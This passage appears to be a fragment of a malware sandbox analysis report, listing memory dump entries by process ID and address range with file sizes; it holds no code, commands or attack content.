10.8MB
-
memory/4088-151-0x0000000000000000-mapping.dmp
-
memory/4240-174-0x0000000000000000-mapping.dmp
-
memory/4312-153-0x0000000000000000-mapping.dmp
-
memory/4456-169-0x0000000000000000-mapping.dmp
-
memory/4456-171-0x0000000000940000-0x0000000000948000-memory.dmpFilesize
32KB
-
memory/4456-184-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/4512-182-0x0000000000000000-mapping.dmp
-
memory/4600-145-0x0000000000000000-mapping.dmp
-
memory/4632-144-0x0000000000000000-mapping.dmp
-
memory/4664-142-0x0000000000000000-mapping.dmp
-
memory/4672-138-0x0000000000000000-mapping.dmp
-
memory/4832-136-0x00007FF8148F0000-0x00007FF8153B1000-memory.dmpFilesize
10.8MB
-
memory/4832-135-0x000001536ADF0000-0x000001536AE12000-memory.dmpFilesize
136KB
-
memory/4832-134-0x0000000000000000-mapping.dmp
-
memory/4892-150-0x0000000000000000-mapping.dmp
-
memory/5068-146-0x0000000000000000-mapping.dmp